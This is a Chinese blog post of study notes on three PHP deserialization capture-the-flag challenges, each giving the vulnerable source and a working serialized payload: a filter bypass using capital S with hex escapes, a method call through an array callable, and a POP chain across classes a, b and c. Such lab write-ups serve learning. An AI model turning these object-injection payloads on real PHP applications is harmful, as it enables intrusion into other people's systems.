end的学习反序列化4

最新推荐文章于 2022-05-17 10:08:58 发布
最新推荐文章于 2022-05-17 10:08:58 发布
阅读量499 收藏 3
点赞数 1
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45781155/article/details/115787609
版权

1,

<?php
include "flag5.php";
class funny{
    private $a;
    function __construct() {
        $this->a = "givemeflag";
    }
    function __destruct() {
        global $flag;
        if ($this->a === "givemeflag") {
            echo $flag;
        }
    }
}
 
if (isset($_GET['tryhackme']) && is_string($_GET['tryhackme'])){
$a = $_GET['tryhackme'];
for($i=0;$i<strlen($a);$i++)
{
    if (ord($a[$i]) < 32 || ord($a[$i]) > 126) {//以一个字符(长度为1的字符串)作为参数,返回对应的 ASCII 数值,或者 Unicode 数值,如果所给的 Unicode 字符超出了你的 Python 定义范围,则会引发一个 TypeError 的异常。
        die("hacker!");
    }
}
unserialize($a);
} else {
    show_source(__FILE__);
}
?>

payload:?tryhackme=O:5:“funny”:1:{S:8:"\00funny\00a";s:10:“givemeflag”;}

此处如果使用小写s并使用%00就会在payload被urldecode后被检测拦截 故使用大写S进行hex code后使用\00进行绕过处理

这样%00就会被转义进而符合要求

2,

<?php
include "flag6.php";
ini_set('display_errors',true);
error_reporting(E_ALL | E_STRICT); 
class funny{
    public function pyflag(){
        global $flag;
        echo $flag;
    }
}
 
if (isset($_GET['tryhackme']) && is_string($_GET['tryhackme'])){
$a = unserialize($_GET['tryhackme']);
$a();
} else {
    show_source(__FILE__);
}
?>

php动态执行函数的能力,即使用变量名后加括号的方式来对函数进行调用。这道题其实是让$a为funny.pyflag

payload:?tryhackme=a:2:{i:0;O:5:“funny”:0:{}i:1;s:6:“pyflag”;}

php动态执行函数的能力

1. 定义一个函数
2. 将函数名(字符串)赋值给一个变量
3. 使用变量名代替函数名动态调用函数
例:
<?php
 function addition ($a, $b){
   echo ($a + $b), "\n";
 }
 $result = "addition";
 $result (3,6);
?>

 $this在OOP中就是伪变量,(伪变量不是真正的变量,只是形式上是变量,变量中存储的是固定的值,$this中并没有,哪个对象调用,$this就代表哪个对象。)
同时,也可以将$this理解为对象的引用,$this通过引用的形式访问一个对象的方法和属性

3,

<?php
 
class a {
    public $object;
 
    public function resolve() {
        array_walk($this, function($fn, $prev){
            if ($fn[0] === "system" && $prev === "ls") {
                echo "Wow, you rce me! But I can't let you do this. There is the flag. Enjoy it:)\n";
                global $flag;
                echo $flag;
            }
        });
    }
 
    public function __destruct() {
        @$this->object->add();
    }
 
    public function __toString() {
        return $this->object->string;
    }
}
 
class b {
    protected $filename;
 
    protected function addMe() {
        return "Add Failed. Filename:".$this->filename;
    }
 
    public function __call($func, $args) {
        call_user_func([$this, $func."Me"], $args);
    }
}
 
class c {
    private $string;
 
    public function __construct($string) {
        $this->string = $string;
    }
 
    public function __get($name) {
        $var = $this->$name;
        $var[$name]();
    }
}
 
if (isset($_GET["tryhackme"])) {
    unserialize($_GET['tryhackme']);
} else {
    highlight_file(__FILE__);
}

paylopad:?tryhackme=O:1:“a”:1:{s:6:“object”;O:1:“b”:1:{s:11:"%00*%00filename";O:1:“a”:1:{s:6:“object”;O:1:“c”:1:{s:9:"%00c%00string";a:1:{s:6:“string”;a:2:{i:0;O:1:“a”:2:{s:6:“object”;N;s:2:“ls”;a:1:{i:0;s:6:“system”;}}i:1;s:7:“resolve”;}}}}}}

这题入手稍加分析,就知道想要拿到flag利用的链条必然是利用以destruct为链首的pop链通过a->b->a->c->a利用c中的那个奇怪的array()调用类a中的resolve方法,或者说成员函数,利用a被摧毁时的add调用,b中的return字符串调用a中的toString这样把整个链条串起来,这样链条就贯通了,我说的三个点便是串起链条的节点。

qq_45781155
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
android XML文件解析和序列化 demo
09-23
2. **Gson**: 虽然Gson主要用于JSON序列化和反序列化,但通过扩展,也可以处理XML。首先将对象转换为JSON,然后使用像`javax.xml.transform.Transformer`这样的工具将JSON转换为XML。 3. **JAXB (Java Architecture...
如何向WTL CRichEditCtrl类添加序列化支持
04-08
然后调用`CRichEditCtrl::StreamIn`函数进行反序列化操作。 6. 在操作完成后,别忘了释放资源,如关闭文件和解除文件映射。 在Visual Studio中,如VC6或VS20XX环境下,你可以使用MFC或ATL/WTL的宏来简化这个过程,...
unserialize_pop和requests、re库学习
xiaobai的博客
08-27 1333
反序列化靶场第八关 是一个pop链的关卡 源码: <?php include("./flag8.php"); class a { public $object; public function resolve() { array_walk($this, function ($fn, $prev) { if ($fn[0] === "system" && $prev === "ls") {
php反序列化
The code way of kinnisoy
03-22 503
ref: https://www.jianshu.com/p/f9bae6f1db14
2022/03/14ctfshow卷王杯easy unserialize
A的博客
03-14 387
public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" && $prev === "year_parm") { global $talk; echo "$talk"."</br>"; global $flag; echo $fla
PHP反序列化由浅入深,php反序列化总结(一)
weixin_30869777的博客
03-16 961
一、魔术方法1、列举__wakeup() //使用unserialize时触发__sleep()//使用serialize时触发__destruct() //对象被销毁时触发__call() //在对象上下文中调用不可访问的方法时触发__callStatic()//在静态上下文中调用不可访问的方法时触发__get() //用于从不可访问的属性读取数据__set() //用于将数据写入不可访问的属性...
unserialize入门练习
xiaobai的博客
08-27 1084
知识点 必须知道的魔术方法: __construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(),当对不可访问属性调用unset()时被调用。 __sleep(),执行serialize(
Python学习笔记.docx
12-13
当左操作数不支持特定运算时,Python会尝试调用右操作数的相关反运算魔法方法,如`__radd__`、`__rsub__`等。字符串是不可变的序列类型,可以用单引号或双引号定义。字符串支持切片和拼接,切片操作通常表示为`start...
shell脚本学习指南[四](Arnold Robbins & Nelson H.F. Beebe著)
09-15
字符串常量使用引号括起,且支持反斜杠转义序列。字符串比较采用传统的比较运算符,如 `==`, `!=`, `, `, `>`, `>=`。对于正则表达式的支持,awk提供了 `~` 和 `!~` 运算符,使得模式匹配变得简单。 awk的数字以双...
MantleDemo:MantleDemo用于学习
05-01
Mantle支持自定义序列化和反序列化逻辑,如上例中的`nameJSONTransformer`。此外,你还可以通过重写`+modelKeys`方法来自定义键值映射。 ### 7. MantleDemo示例 "MantleDemo-master"这个压缩包可能包含了一个简单...
PHP反序列化漏洞总结
未完成的歌~的博客
02-22 3612
程序未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,通过在参数中注入一些代码,从而达到代码执行,SQL 注入,目录遍历等不可控后果,危害较大。
php array_walk(),记php数组函数 array_walk的使用场景
weixin_42640676的博客
03-10 226
1:php在重写mysql的插入insert函数的使用,接受一个参数是$data为一个关联数组,键是数据库表字段,值是字段对应的值。我们使用array_keys()函数获取所有的键组成一个新的数组。使用array_values()函数获取所有的值组成一个新的数组。这里就有一个问题了,我们的sql拼接的时候需要将每一个键也就是表字段加上反引号(`字段`),给所有的值也就是表字段的值加上引号('值')...
CTFSHOW[卷王杯](上)
errorr0
03-19 2932
ctfshow卷王杯
php反序列化语句实例,PHP反序列化的一些例子
weixin_34006872的博客
03-11 572
之前web一直被PHP反序列化的一些问题困扰,现在痛定思痛,决定好好的总结一番(大佬请略过)一般反序列化能用的例子都是利用了PHP中的一些可以自动调用的特殊函数,类似于C++中的构造函数之类的,不需要其他函数调用即可自动运行。通常称这些函数为魔幻函数,常用的魔幻函数包括construct(),destruct(), sleep(),wakeup(), toString().首先我们以constr...
php+反序列化方法,PHP序列化反序列化的方法详解
weixin_33242139的博客
03-19 158
在一些开源的php源代码中,我们经常看到一些配置文件里面存放的是一些类似带有格式的变量名称和值。刚开始还不明白这个是怎么回事儿。后来才知道这个是为了将一个复杂(也可能并不那么复杂)的数据结构转换成一个字符串,以便于保存和传递。其实就是一个序列化的过程,在需要用到这些数据库的时候会进行一个反序列化过程,就是将这个字符串再还原成他原来的数据结构。下面说说 php 如何进行数据的序列化和反序列化的。ph...
CTFSHOW卷王杯 easy unserialize
Landasika的博客
05-17 1278
<?php include("./HappyYear.php"); class one { public $object; public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" &&am...
php反序列化绕过,浅谈php反序列化漏洞
weixin_42513988的博客
03-19 339
关于php的反序列化漏洞要先说到序列化和反序列化的两个函数,即:serialize()和unserialize()。简单的理解:序列化就是将一个对象变成字符串反序列化是将字符串恢复成对象这样做的意义是为了将一个对象通过可保存的字节方式存储起来,同时就可以将序列化字节存储到数据库或者文本当中,当需要的时候再通过反序列化获取 。另外我们提一下 2016 年的 CVE-2016-7124 绕过 __...
CTF中的PHP反序列化ALL IN ONE
热门推荐
Love&Share
09-01 1万+
CTF中的PHP反序列化 1.反序列化的基础知识 什么是序列化,反序列化,php反序列化,序列化字符串知识,漏洞产生原因,修复方法 php反序列化漏洞,又叫php对象注入漏洞,是ctf中常见的漏洞。 PHP基础知识 PHP类与对象(https://www.php.net/manual/zh/language.oop5.php) PHP魔术方法(https://secure.php.net/manual/zh/language.oop5.magic.php) 序列化定义 php程序为了保存和转储对象,提供了序
php反序列化ctf,代码审计| CTF 中的反序列化问题
weixin_28990495的博客
03-21 531
0x00 序列化和反序列化简单的理解:序列化就是使用serialize()将对象的用字符串的方式进行表示,反序列化是使用unserialize()将序列化的字符串,构造成相应的对象,反序列化是序列化的逆过程。序列化的对象可以是class也可以是Array,string等其他对象。0x01 对象序列化和反序列化的功能作用1. 对象序列化的功能作用概念:对象是在内存中存储的数据类型,寿命通常随着生成该...
python学习笔记1
最新发布
08-04
1.1. 规范 1.2. “\”用法 1.3. "+" 1.4. 占位符 1.5. 格式化字符串 1.6. 变量,对象特性 1.6.1. 输出 1.6.2. 输

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值